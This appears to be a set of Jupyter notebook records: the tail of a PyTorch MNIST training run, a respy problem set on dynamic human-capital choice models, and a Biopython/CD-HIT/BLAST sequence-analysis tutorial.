images: 10 %\n" ], [ "net2 = Net(input_size, hidden_size, num_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net2.parameters(), lr=learning_rate)\n# optimizer = torch.optim.Adam(net3.parameters(), lr=learning_rate)\n\nlosses = []\n\nfor epoch in range(num_epochs):\n for i, (images, labels) in enumerate(train): \n images = Variable(images.view(-1, 28*28)) \n labels = Variable(labels)\n\n optimizer.zero_grad() \n outputs = net2(images) \n \n loss = criterion(outputs, labels) \n loss.backward() \n optimizer.step() \n \n losses.append(loss.item())\n \n if (i+1) % 600 == 0: \n\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n %(epoch+1, num_epochs, i+1, len(train)//batch_size, loss.item()))", "Epoch [1/60], Step [600/6], Loss: 2.2802\nEpoch [2/60], Step [600/6], Loss: 2.2480\nEpoch [3/60], Step [600/6], Loss: 2.2217\nEpoch [4/60], Step [600/6], Loss: 2.1731\nEpoch [5/60], Step [600/6], Loss: 2.1026\nEpoch [6/60], Step [600/6], Loss: 2.0168\nEpoch [7/60], Step [600/6], Loss: 1.9046\nEpoch [8/60], Step [600/6], Loss: 1.7641\nEpoch [9/60], Step [600/6], Loss: 1.5110\nEpoch [10/60], Step [600/6], Loss: 1.2992\nEpoch [11/60], Step [600/6], Loss: 1.0070\nEpoch [12/60], Step [600/6], Loss: 0.9867\nEpoch [13/60], Step [600/6], Loss: 0.7954\nEpoch [14/60], Step [600/6], Loss: 0.7992\nEpoch [15/60], Step [600/6], Loss: 0.7754\nEpoch [16/60], Step [600/6], Loss: 0.6703\nEpoch [17/60], Step [600/6], Loss: 0.7269\nEpoch [18/60], Step [600/6], Loss: 0.6204\nEpoch [19/60], Step [600/6], Loss: 0.5545\nEpoch [20/60], Step [600/6], Loss: 0.4842\nEpoch [21/60], Step [600/6], Loss: 0.5564\nEpoch [22/60], Step [600/6], Loss: 0.5936\nEpoch [23/60], Step [600/6], Loss: 0.4120\nEpoch [24/60], Step [600/6], Loss: 0.4483\nEpoch [25/60], Step [600/6], Loss: 0.5071\nEpoch [26/60], Step [600/6], Loss: 0.4077\nEpoch [27/60], Step [600/6], Loss: 0.3829\nEpoch [28/60], Step [600/6], Loss: 0.4368\nEpoch [29/60], Step [600/6], Loss: 0.5123\nEpoch [30/60], Step [600/6], Loss: 0.4163\nEpoch [31/60], Step [600/6], Loss: 0.4924\nEpoch [32/60], Step [600/6], Loss: 0.4044\nEpoch [33/60], Step [600/6], Loss: 0.4085\nEpoch [34/60], Step [600/6], Loss: 0.3780\nEpoch [35/60], Step [600/6], Loss: 0.3415\nEpoch [36/60], Step [600/6], Loss: 0.3895\nEpoch [37/60], Step [600/6], Loss: 0.5168\nEpoch [38/60], Step [600/6], Loss: 0.4380\nEpoch [39/60], Step [600/6], Loss: 0.4083\nEpoch [40/60], Step [600/6], Loss: 0.3747\nEpoch [41/60], Step [600/6], Loss: 0.3367\nEpoch [42/60], Step [600/6], Loss: 0.4946\nEpoch [43/60], Step [600/6], Loss: 0.3071\nEpoch [44/60], Step [600/6], Loss: 0.2328\nEpoch [45/60], Step [600/6], Loss: 0.2457\nEpoch [46/60], Step [600/6], Loss: 0.3495\nEpoch [47/60], Step [600/6], Loss: 0.2415\nEpoch [48/60], Step [600/6], Loss: 0.4515\nEpoch [49/60], Step [600/6], Loss: 0.3182\nEpoch [50/60], Step [600/6], Loss: 0.2965\nEpoch [51/60], Step [600/6], Loss: 0.2352\nEpoch [52/60], Step [600/6], Loss: 0.3287\nEpoch [53/60], Step [600/6], Loss: 0.3073\nEpoch [54/60], Step [600/6], Loss: 0.3863\nEpoch [55/60], Step [600/6], Loss: 0.3859\nEpoch [56/60], Step [600/6], Loss: 0.3927\nEpoch [57/60], Step [600/6], Loss: 0.2850\nEpoch [58/60], Step [600/6], Loss: 0.3616\nEpoch [59/60], Step [600/6], Loss: 0.3419\nEpoch [60/60], Step [600/6], Loss: 0.4538\n" ], [ "acc(net2, train)", "Accuracy of the network train images: 91 %\n" ], [ "## Evaluate the model\ncorrect = 0\ntotal = 0\ni = 0\nfor images2, labels2 in test:\n \n images = Variable(images2.view(-1, 28*28))\n \n \n outputs = net2(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels2.size(0) \n correct += (predicted == labels2).sum() \n i += 1\n \nprint('Accuracy of the network on the 10K test images: %d %%' % (100 * correct / total))", "Accuracy of the network on the 10K test images: 91 %\n" ] ], [ [ "#### ", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ] ]
e7301eff6d0fd98cdd232b9498f60b95a9db5b71
19,659
ipynb
Jupyter Notebook
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
56.168571
731
0.666565
[ [ [ "## Problem Set - Dynamic life-cycle models of human capital accumulation with respy\n\nIn this problem set, we will work with Eckstein-Keane-Wolpin (EKW) models, a class of dynamic discrete choice models that are used to address economic questions in the realm of labor and education economics. Prominent examples of such models in economic research are Keane and Wolpin (1994, 1997, 2000) and more recently Blundell et al. (2016), Adda et al. (2017), and Eckstein et al. (2019). For the problem set, we will be working with a toy model that follows the famous story of Robinson Crusoe who is stranded on a deserted island. Our version of this story focuses on his work and leisure decisions during the time on the island, specifically the human capital he accumulates as he engages in productive activities. \n\nWe will be using the Python package [respy](https://respy.readthedocs.io) to implement and analyze the economic model. Below, you find a summary of the economic framework of the problem set. For a detailed description of this specific model, please refer to the [introductory tutorial](https://respy.readthedocs.io/en/latest/tutorials/robinson_crusoe.html) in the **respy** documentation. An extended outline of EKW models using the example of the seminal model presented in Keane and Wolpin (1997) can be found in the [explanations](https://respy.readthedocs.io/en/latest/explanations/index.html) section of the documentation. \n\nThe problem set consists of four exercises. In the first exercise you are asked to examine the simulated data in detail and identify components that make up the rewards in the model. The second exercise explores the modeling and policy evaluation capabilities of **respy** in the context of the intertemporal trade-off that Robinson is facing. The third exercise focuses on the discrete choice dynamic programming problem that lies at the heart of the structural model to explore the trade-off between computation time and model components. Lastly, the fourth exercise explores the numerical integration of the expected value functions to illustrate numerical components of model implementation.", "_____no_output_____" ] ], [ [ "import timeit\nimport respy as rp\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "## Economic Setting: Robinson Crusoe on an island\n\n- Robinson chooses every period $t = 0, \\dots, T$ to either go fishing, $a = 0$, or spend the day in the hammock, $a = 1$.\n\n- If Robinson chooses to go fishing, he gains one additional unit of experience in the next period. Experience starts at zero.\n\n- The utility of a choice, $U(s_t, a_t)$, depends on the state $s_t$, which contains information on the individual's characteristics, and the chosen alternative $a_t$.\n\n- Robinson's utility for any given option can be denoted by\n\n$$\\begin{align}\n U(s_t, a_t) = \\underbrace{W(s_t, a_t)}_{wage} + \\underbrace{N(s_t, a_t)}_{non-pecuniary}\n\\end{align}$$\n\n**Working alternatives**\n\n- For working alternatives like fishing, utility consists of two components, a wage and a non-pecuniary component. The wage is defined as \n\n$$\\begin{align}\n W(s_t, a_t) &= r_a \\exp\\{x^w_{at} \\beta^w_a + \\epsilon_{at}\\}\\\\\n \\ln(W(s_t, a_t)) &= \\ln(r_a) + x^w_{at} \\beta^w_a + \\epsilon_{at}\n\\end{align}$$\n\n- It consists of several components:\n - $r_a$ is a market rental price for skill units.\n - $x^w_{at}$ and $\\beta^w_a$ are the choice- and time-dependent covariates and returns related to the wage signaled by superscript $w$. \n - $\\epsilon_{at}$ is a choice-specific random shock from the shock vector $\\epsilon_t \\sim \\mathcal{N}(0, \\Sigma)$ for all choices.\n\n- The non-pecuniary rewards for working alternatives are a vector dot product of covariates $x_t^w$ and parameters $\\beta^w$. The superscript $w$ signals that the components belong to working alternatives.\n\n$$\\begin{align}\n N^w(s_t, a_t) = x_t^w\\beta^w_{a}\n\\end{align}$$\n\n**Non-working alternatives**\n\n- For non-working alternatives like the hammock, $W(s_t, a_t) = 0$. The non-pecuniary reward for non-working alternatives is very similar to the working alternative except that the shocks enter the equation additively. Superscript $n$ stands for non-pecuniary.\n\n$$\n N^n(s_t, a_t) = x_t^n\\beta^n_{a} + \\epsilon_{at}\n$$\n\n\n- Robinson's choice set thus consists of a \"working\" alternative which awards him a pecuniary compensation or wage and a \"leisure\" or non-working alternative which he derives a utility from, but no experience or wage. Experience in this basic model starts at zero and increases by one for every period $t$ in $1, ..., T$ where he chooses to go fishing. \n\n\n**Robinson's choice problem**\n\n- During his time on the island, Robinson has to make choices about which actions to take. The general assumption is that Robinson is forward-looking and maximizes the expected present value of utility over the remaining lifetime which is achieved by selecting the optimal sequence of choices $\\{a_t\\}^T_{t = 0}$.\n\n\n- Robinson's decision problem can be expressed as a Bellman equation where the value of a given state consists of the current and future state values associated with it. \n\n$$\\begin{align}\n V(s_{t})&= \\max_{a_t} \\, \\{\\underbrace{U(s_t, a_t)}_{\\text{flow utility}}+ \\delta \\underbrace{\\text{E}[ V(s_{t+1})]\\}}_{\\text{continuation value}}\n\\end{align}$$\n\n- For each period, the value of a given choice consists of its flow utility and its continuation value. Since the realization of shocks becomes known in each period before Robinson makes his choice, the flow utility can be extracted from the expectation operator. As shocks in period $t + 1$ are unknown to the individual in period $t$, utility must be maximized given the joint distribution of shocks in period $t + 1$ which is a maximization problem over a two-dimensional integral. Denote the non-stochastic part of a state as $s^-$. Then, Robinson maximizes\n\n$$\\begin{equation}\n V(s_t) = \\max_{a_t}\\{\n U(s_t, a_t) + \\delta \\int_{\\epsilon_{1, t + 1}} \\int_{\\epsilon_{0, t + 1}}\n \\max_{a_{t + 1}} V_{a_{t + 1}}(s^-_{t + 1}, \\epsilon_{t + 1})\n f_\\epsilon(\\epsilon_{t + 1})\n d_{\\epsilon_{0, t + 1}}, d_{\\epsilon_{1, t + 1}}\n \\}\n\\end{equation}$$", "_____no_output_____" ], [ "### Setup: Loading the model\n\nLoad the example model `robinson_crusoe_basic` into memory using the function `get_example_model` by executing the cell below. The function returns a DataFrame of `params` which contains the model parameters, the dictionary `options` holding model options, and a set of simulated data.", "_____no_output_____" ] ], [ [ "params, options, data = rp.get_example_model(\"robinson_crusoe_basic\")", "_____no_output_____" ] ], [ [ "The parameters correspond to the model equations. Since this is a very simple model, there are only 7 parameters. The table below shows the parameters that appear in the reward functions.", "_____no_output_____" ], [ "|parameter | category | name | value |\n|-----------------------|-------------------|---------------|-------|\n|$\\delta$ | **delta** | **delta** | 0.95 |\n|$\\beta^{w}_{fishing1}$ | **wage_fishing** |**exp_fishing**| 0.30 |\n|$\\beta^{w}_{fishing2}$ | **nonpec_fishing**| **constant** | -0.20 |\n|$\\beta^{n}_{hammock}$ | **nonpec_hammock**| **constant** | 2.00 |", "_____no_output_____" ], [ "Aside from the parameters, the `params` DataFrame also contains components of the shock matrix of the model. The parameters listed under the category `shocks_sdcorr` correspond to the lower triangular of the shock variance-covariance matrix which is a square matrix with dimensions that correspond to the number of choices of the model. We can define these shock components in different ways, but here they are defined as standard deviations (diagonal elements of the matrix) and correlations of shocks between choices (lower-triangular elements).", "_____no_output_____" ], [ "---\n\n### Exercise 1: Explore the data\n\nFamiliarize yourself with the `data` for our simple Robinson Crusoe model.\n\n1. How is the data structured? What purpose do the two index levels in the DataFrame serve?\n2. Inspect the data columns. What information is provided? How do the data columns correspond to the model equations? Where can you find Robinson's decisions and rewards?\n3. Plot the choice frequencies for each period. What proportion of Robinsons goes fishing, how many individuals choose to relax in the hammock?\n4. How much experience does Robinson accumulate over time? Plot the frequencies of experience levels for each period.\n\n*Hint: You can use the pandas functions [pandas.DataFrame.groupby](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.groupby.html) and [pandas.Series.value_counts](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.value_counts.html) to compute the quantities of interest.*", "_____no_output_____" ], [ "---", "_____no_output_____" ], [ "### Exercise 2: Model mechanisms and economic analysis\n\nNow that we have familiarized ourselves with the data, we can analyze Robinson's choices in more detail. In our dynamic model, Robinson is forward-looking and thus takes future states into account when making his decisions.\n\n1. For now, focus on Robinson in the first period captured in the `data`. How would his choices change if he only took his current period utility (i.e. the **flow utility of period 0**) into account and ignored future rewards? Compute the choice frequencies for this scenario and compare them to his actual choices. \n\n2. Let's assess the choices of a myopic Robinson over all time periods. **Edit the parameter vector** accordingly and **simulate** data for this scenario. How do Robinson's choices now compare to the baseline scenario? What happens if Robinson values future rewards exactly the same as current period rewards?\n\n3. We can also imagine a technology shock that augments Robinson's return to experience in fishing. Let's assume the shock increases his return by **10%**. Implement the technology shock and simulate data to compare Robinson's choices against the baseline scenario. Which part of Robinson's utility is affected by this adjustment? Can you think of real world examples for policy interventions which we could simulate with a model like this? ", "_____no_output_____" ], [ "---\n\n### Exercise 3: Model computation time\n\nAn important aspect of structural econometric models like the one assessed in this problem set is the discrete choice dynamic programming (DCDP) problem which lies at the heart of the model. With increasing model components like choices, individual characteristics, and time periods the computational complexity of this problem increases as the potential states (state space) that have to be considered to determine Robinson's optimal choice path grows. In this exercise we will thus inspect the state space and computation time of the model in more detail. A **respy**'s model can be solved in two steps:\n\n```\nsolve = rp.get_solve_func(params, options)\nstate_space = solve(params)\n\n```\n\nThe first step constructs the state space for the model. In the second step, the DCDP problem is solved for a given parameter vector. **respy** utilizes two-step approaches like this for many functions to facilitate usage and cut down on computation time. In the following we assess how different modeling components affect the solution time of the model.\n\n1. One impotant such component are the number of periods considered in a model. Solve the `robinson_crusoe_basic` model for **different numbers of periods in the model** (maximum of 30-40) and log the solution time. Repeat the exercise 10 times for each number of periods and plot the mean solve time to compare how to solution time increases with the number of periods considered in the model. **Note that you only need to time the second step ```state_space = solve(params)``` shown above**.\n\n2. Let's now compare the solution time of **multiple models**. Assess the solution time of the models `robinson_crusoe_basic`,`robinson_crusoe_extended`, `kw_94_one`, and `kw_97_basic` (if possible) which exhibit an increasing number of choices available in the model. Set the number of periods to 20 for all models to make them more comparable in regards to time horizon and analyze the results. How many choices are available in each model and how does the solution time increase? \n\n Note that there are some other components that distinguish the models than just the number of periods and available choices. Assess the `params` and `options` of the models. Which components likely also influence the solution time?\n ", "_____no_output_____" ], [ "---\n\n### Exercise 4: Numerical integration\n\nOne important component of the solution to the DCDP problem in **respy** models is numerical integration. Solving for the optimal decision sequence requires us to solve a multi-dimensional integral at every point in the state space to find the expected value functions. The integrated value function does not have an analytical solution and thus requires the application of numerical methods. \n\nThe **respy** interface provides users with multiple methods for numerical integration. The relevant options to calibrate the integration method are `options[\"solution_draws\"]` which determines the number of integration points and `options[\"monte_carlo_sequence\"]` which determines the sequence that generates these points.\n\n**respy** offers Monte Carlo and Quasi-Monte Carlo methods to generate sequences for integration:\n\n- Monte Carlo Simulation: Chooses points randomly in the domain (`random`).\n- Quasi Monte Carlo Simulation: Chooses points from one of the two low-discrepancy sequences (`sobol`, `halton`).\n\n\nIn this exercise, we seek to implement a small simulation exercise to explore numerical integration in our Robinson Crusoe example.\n\n1. Load the `robinson_crusoe_extended` into memory and change the `solution_draws` in the `options` to a large number (e.g. 10,000) and simulate data. Compute choice frequencies based on this data. In the next steps we will treat these as the true solution and benchmark how different methods perform in comparison.\n3. Now simulate data for **different numbers of solution draws**. Compute the **root-mean-square-error (RMSE) of the choice frequencies** in this data compared to the *true* solution. Repeat the exercise for the three different sequences that are available in the **respy** interface: `sobol`, `halton`, and `random` and plot the resulting RMSE against the number of solution draws.\n", "_____no_output_____" ], [ "---\n\n### References\n\n- Adda, J., Dustmann, C., & Stevens, K. (2017). The career costs of children. *Journal of Political Economy*, 125(2), 293-337.\n\n- Blundell, R., Costa Dias, M., Meghir, C., & Shaw, J. (2016). Female labor supply, human capital, and welfare reform. *Econometrica*, 84(5), 1705-1753.\n\n- Eckstein, Z., Keane, M., & Lifshitz, O. (2019). Career and family decisions: Cohorts born 1935–1975. *Econometrica*, 87(1), 217-253.\n\n- Keane, M. P., & Wolpin, K. I. (1994). The solution and estimation of discrete choice dynamic programming models by simulation and interpolation: Monte Carlo evidence. The review of economics and statistics, 648-672.\n\n- Keane, M. P., & Wolpin, K. I. (1997). The career decisions of young men. *Journal of Political Economy*, 105(3), 473-522.\n\n- Keane, M. P., & Wolpin, K. I. (2000). Eliminating race differences in school attainment and labor market success. *Journal of Labor Economics*, 18(4), 614-652.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e73027a30852d65907f7c4fe94940a7701a518f2
19,065
ipynb
Jupyter Notebook
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
null
null
null
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
null
null
null
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
83
2021-06-07T21:31:14.000Z
2021-07-09T17:41:18.000Z
19,065
19,065
0.722948
[ [ [ "# Working with Sequence files using Biopython\n\nThe code boxes below will increase in complexity as we go on. Comments in the code begin with #s. Read these if you want help understanding the code.\n\nIn the first code box below, the first line \"turns on\" the SeqIO function of Biopython, a package (set of tools) built for biology and biochemistry! You can learn more at https://biopython.org/\n\nThe second line uses SeqIO (think: sequence input and output) to read a fasta file and stores the information as a list of records.\n\n<font color=blue><b>STEP 1:</b></font> The command below won't run correctly (you can try it!) unless you enter in the file to read. <b> Between the quotes, where it says <<\\<your file here>>>, change it to : files/uniprot-dtxr.fasta.</b>\n \nThen shift+enter to run the code. Be sure to wait for a number to appear in the brackets to the left of the code box. When the asterisk appears, that code is actively running!\n", "_____no_output_____" ] ], [ [ "from Bio import SeqIO # imports the SeqIO function from Biopython\n\nrecords = list(SeqIO.parse(\"<<<your file here>>>\", \"fasta\")) # reads the fasta file into a list of records \nprint(\"Finished storing the FASTA file in the list called \\\"records\\\".\")", "_____no_output_____" ] ], [ [ "While this <em>did</em> read the fasta file into a list of records, it isn't obvious how this helps us. Let's see how we can access different information about the sequence records stored in the list, records.\n\n<font color=blue><b>STEP 2:</b></font> The first line below will tell us how many sequences were in the fasta file, and then the information stored in the first item. Note that python numbering starts with the number 0. Go ahead and run the code box below.", "_____no_output_____" ] ], [ [ "print(\"There are %i sequences in your file.\\n\" % len(records)) # prints the number of sequences, that is, the length of the list, named records\n\nprint(records[0]) #prints the information in the first record", "_____no_output_____" ] ], [ [ "You should be able to see that first record includes several things: an ID, Name, Description, and a Sequence.\n\nWe can access each of those items specifically\n\n<font color=blue><b>STEP 3:</b></font> Run the code below to print only the sequence of the first record.", "_____no_output_____" ] ], [ [ "print(records[0].seq)", "_____no_output_____" ] ], [ [ "The next code box shows us how to list the first 10 ids. Then it lists the first record id and its sequence.\n\n<font color=blue><b>STEP 4:</b></font> Run the code box below.", "_____no_output_____" ] ], [ [ "print(\"The first 10 sequence record ids are:\\n\")\nfor i in range(10): # this creates a variable i and counts to 10\n print(records[i].id) # prints the id for record i\n \nprint(\"\\nThe record: %s has a sequence of: %s\\n\" % (records[-1].id, records[-1].seq)) # prints the record id and its sequence!", "_____no_output_____" ] ], [ [ "***\nGreat! The code above finds the first record (recall in Python we start counting at zero), so records[0].id gets the identification of the first record. \n\n<font color=blue><b>STEP 5:</b></font> Edit the last print statement in the code above to give the id and sequence of the 100th record.\n\nWe can also look at the last record id. You could put in the number of records (less one), but -1 is easier! The -1 starts counting from the end of the records list and you don't need to know how many records you have.\n\n<font color=blue><b>STEP 6:</b></font> Edit the last print statement in the code above to give the id and sequence of last record.\n\n***", "_____no_output_____" ], [ "<font color=blue><b>STEP 7:</b></font> Before you move on, check your knowledge by using the empty code box above to enter some code to answer these questions.\n\n 1. What is the sequence id for the 3rd record in the file?\n 2. What is the sequence id for the 250th record in the file?\n 3. What is the sequence id for the penultimate record in the file?\n \n<font color=blue><b>STEP 8:</b></font> It might be quite clear that simply locating records by their number isn't always the best way to interact with the data. Perhaps we would like to search by name, ID, or description. Let's examine the comments below to see how we can do this. You will need to edit the line that sets the variable search_term. In the code box below, change the text <b>\\<<<search term here\\>>></b> to one of the search terms below. Then run the code box.\n\n Search term ideas: DTXR, IDER, MNTR, dtxr, ider, mntr\n\n Where to search ideas: id, description, name", "_____no_output_____" ] ], [ [ "import re # imports the re (Regular Expressions) functions\n\nsearch_term = \"<<<search term here>>>\" # in between the quotes we can add a search term.\n \n\ncounter = 0 # a variable to keep track of how many times we find the term\n\nfor item in records: # this creates a loop to iterate over all the records \n if re.search(search_term, item.description, re.IGNORECASE): # Here we use re.search to find the search term in the item ID, returns true if yes\n print(item.description) # If the above is true we print the item ID...\n counter = counter + 1 # and increment our counter\n else: continue # if the search term wasn't found we do nothing, just continue on\n\n \n# the next two lines print a summary for us - either no hits or how many hits.\n \nif not counter: print(\"We didn't find any results using the search term: %s\" % search_term)\nelse: print(\"\\nWe found %i records using the search term: %s\" % (counter, search_term))", "_____no_output_____" ] ], [ [ "***\n\n<font color=blue><b>STEP 9:</b></font> Edit the code above to search the description rather than the ID. Make sure to change it in both places!\n\n***\n\nUsing Biopython's SeqIO function allows us to store lots of data in a way that is rapidly accessible.\n\nAs you have seen above, the IDs are a little long and redundant with the name. The code below simplifies the record ID and writes a new, simpler file.\n\n<font color=blue><b>STEP 10:</b></font> Read through the code below and run it.", "_____no_output_____" ] ], [ [ "original_file = \"files/uniprot-dtxr.fasta\" # original file path\nsimple_file = \"files/uniprot-dtxr_simple.fasta\" # new file path\n\nwith open(original_file) as original, open(simple_file, 'w') as simple: #opens the file to read and one to write\n records = SeqIO.parse(original, 'fasta') # here we use the Biopython SeqIO again to parse the file into records\n\n for item in records: # iterate through each item in the list called records\n tmp_name = str.split(item.id, \"|\")[1] # sets the variable tmp_name to the second item generated by splitting at the | character \n item.id = tmp_name # now this sets the id of that item to the name\n SeqIO.write(item, simple, 'fasta') # writes out the item information to the new, corrected fasta file", "_____no_output_____" ] ], [ [ "There is no output given for the above code. Let's consider how we changed this file by looking at the simplfied file.\n\n<font color=blue><b>STEP 11:</b></font> You can find the new file in the file browser in the left of your screen and double click to open it.", "_____no_output_____" ], [ "***\n## Big Data Strategies - Filtering and Reducing Redundancy in Datasets\n\nNow that we have a simpler fasta file, we still have a lot of sequences to deal with. It is often best to use fast and easy methods to pare down a dataset before using more computationally intensive ones. \n\nWe will start by filtering out small fragments and large proteins, then move on to removing redundancy.\n***", "_____no_output_____" ], [ "## Filtering by length\n\nLet's visualize the distribution of sequence lengths in our dataset. The code below will generate a histogram of the lengths of sequences. Charlie Weiss will give a thorough demonstration of this tool on Thursday!\n\n<font color=blue><b>STEP 12:</b></font> Run the code below to generate a histogram of sequence lengths.\n", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\n\nrecords = list(SeqIO.parse(\"files/uniprot-dtxr_simple.fasta\", \"fasta\"))\n\nlengths = []\n\nfor i in records:\n #print(i.seq)\n lengths.append(len(i.seq))\n\nlengths.sort()\n#print(lengths)\n\nplt.hist(lengths, bins = 100)\nplt.xlabel('seq length')\nplt.ylabel('count')\nplt.show()", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 13:</b></font> Answer the question:\n\n 1. Using the histogram, what are the most common lengths of proteins in this dataset?\n\n***\n\nWe will further reduce the complexity of this dataset by removing sequences that are much larger and much smaller than the most common lengths shown. Those variables can be determined using a histogram and easily changed for different datasets. Using the histogram we can identify values for the small_len=115 and large_len=250 variables.\n\n<font color=blue><b>STEP 14:</b></font> Run the code below to remove short and long sequences and generate a new fasta file called \"files/uniprot-dtxr_simple_trim.fasta\".\n", "_____no_output_____" ] ], [ [ "from Bio import SeqIO\n\noriginal_file = \"files/uniprot-dtxr_simple.fasta\"\ntrimmed_file = \"files/uniprot-dtxr_simple_trim.fasta\"\n\nsmall_len = 115\nlarge_len = 250\n\nwith open(original_file) as original, open(trimmed_file, 'w') as trimmed:\n records = SeqIO.parse(original_file, 'fasta')\n\n for record in records:\n if len(record.seq) > small_len and len(record.seq) < large_len: \n #print(len(record.seq))\n SeqIO.write(record, trimmed, 'fasta')\n \nrecords2 = list(SeqIO.parse(\"files/uniprot-dtxr_simple_trim.fasta\", \"fasta\"))\nprint(\"We now have %i sequences in our fasta file.\" % len(records2))", "_____no_output_____" ] ], [ [ "The above procedure removed about 5,000 sequences. This is a good start, but still a lot of sequences to visualize.\n***\n## Reducing sequence redundancy using CD-HIT\n\nWe will use the program CD-HIT to remove sequence within a given sequence similarity to another sequence. For example, the flag \"-c 0.4\" given below will keep only sequences with less than 40% sequence identity. The -n flag selects the word size used in processing. Less sequence identity requires the use of smaller words in comparing the sequences. From the CD-HIT manual:\n\n Choice'of'word'size:\n -n 5 for thresholds 0.7 ~ 1.0\n -n 4 for thresholds 0.6 ~ 0.7\n -n 3 for thresholds 0.5 ~ 0.6\n -n 2 for thresholds 0.4 ~ 0.5\n\nCD-HIT was installed when you launched the Binder. This is one of the benefits of using Binder.org\n\nFor this exercise we will use a cutoff of 40%. <b>In practice you might select higher values, but this will increase runtimes for the following steps and the visualization in the next Jupyter Notebook.</b>\n\n<font color=blue><b>STEP 15:</b></font> Let's run the code below. This runs CD-HIT using the simplified and trimmed fasta as input (-i) and creates a new fasta output (-o) named uniprot-dtxr_40.fasta that will be much smaller. The bang (!) at the beginning tells the notebook this is not a Python command, but rather a program to be run from the unix environment. <b>Note running CD-HIT takes a few minutes so this is a good time to take a quick break or ask questions!", "_____no_output_____" ] ], [ [ "!cd-hit -i files/uniprot-dtxr_simple_trim.fasta -o files/uniprot-dtxr_40.fasta -c 0.4 -n 2", "_____no_output_____" ] ], [ [ "CD-HIT has reduced over 30,000 sequences to under 2000 at 40% sequence identity! This is one strategy for dealing with very large datasets - they can be reduced. However, reduction needs to be done in a logical and reproducible manner. CD-HIT does just that. Again, depending on how closely related these proteins are, we might need to try different percent identity cutoffs. We will stay with 40%.", "_____no_output_____" ], [ "***\n## Adding in sequences of known function\n\nWe are almost done processing our FASTA dataset. In order to ensure that we can identify sequences of known function, we have created a small set of FASTA sequences of known function - obtained from the Protein Databank (https://rcsb.org). We will add these knowns to the FASTA file using the cat command (it stands for concatenate). \n\n<font color=blue><b>STEP 16:</b></font> Run the code below which combines the two files into a new file called \"files/final_40.fasta.", "_____no_output_____" ] ], [ [ "!cat \"files/uniprot-dtxr_40.fasta\" \"files/dtxr_pdbs.fasta\" > \"files/final_40.fasta\"", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 17:</b></font> Run the code below to determine the final number of sequences in your file! ", "_____no_output_____" ] ], [ [ "records = list(SeqIO.parse(\"files/final_40.fasta\", \"fasta\")) # use SeqIO to process the file\n\nprint(\"There are %i sequences in your file.\\n\" % len(records)) # print the number of sequences", "_____no_output_____" ] ], [ [ "***\n\n## Making a BLAST-able database and performing an all-by-all BLAST search\n\nNow that we have our dataset we are going to use some of the NCBI BLAST tools to 1) create a searchable database using our processed set of sequences and 2) use protein BLAST to complete an all-by-all search of that database using each of those sequences.\n\nWe will perform an analysis of the evolutionary links between these sequences by determining which sequences are most closely related to which others.\n\n<font color=blue><b>STEP 18:</b></font> Let's see what the command makeblastdb does by using the -h (help) flag after the program name. Go ahead and run the code below. ", "_____no_output_____" ] ], [ [ "!makeblastdb -help", "_____no_output_____" ] ], [ [ "The output above tells us the application of the program and how to indicate input and outout files.\n\n<font color=blue><b>STEP 19:</b></font> In the code box below we have added input and output files and told the program it is a protein database. The input is the files/final_40.fasta file. We will name the output files files/finalpro_40. Go ahead and run this code.", "_____no_output_____" ] ], [ [ "!makeblastdb -in files/final_40.fasta -dbtype prot -out files/finalpro_40", "_____no_output_____" ] ], [ [ "That last step was really quite fast given the smaller number of sequences. You can try this with more sequences, it will be slower, but you might need to use more sequences to find connections among your proteins. We should be good with this number for the exercise today.\n\n<font color=blue><b>STEP 20:</b></font> Next we want to use blastp (Basic Local Alignment Search Tool - Protein) to take each of our protein sequences and search the database for connections. Let's start by finding out the usage of blastp by running the command below.", "_____no_output_____" ] ], [ [ "!blastp -help", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 21:</b></font> <b>This is the final step in generating new data to visualize in the next Jupyter Notebook.</b> We will run the code below to use blastp to search the files/finalpro_40 database using each of the sequences in the files/final_40.fasta file. <b>To be very clear - this will run almost 2000 BLAST searches!!!</b>\n\nThe outfmt controls the output formatting and the -evalue is the expectation value. Briefly evalues tell us how often we expect a search to return a given result by chance. An evalue of 1 would mean that the blast result would always be found by chance (and not by an evolutionary link). Smaller evalues help us to ensure that the results are not found simply by chance. In the code below we are using a value of 10e-40. Less stringent values of 10e-22 could also be used; however, this results in more data to visualize and longer processing times. ", "_____no_output_____" ] ], [ [ "!blastp -db files/finalpro_40 -query files/final_40.fasta -outfmt \"6 qseqid sseqid evalue\" -out files/BLASTe40_out -num_threads 4 -evalue 10e-40", "_____no_output_____" ] ], [ [ "Once the above code has completed running you should see 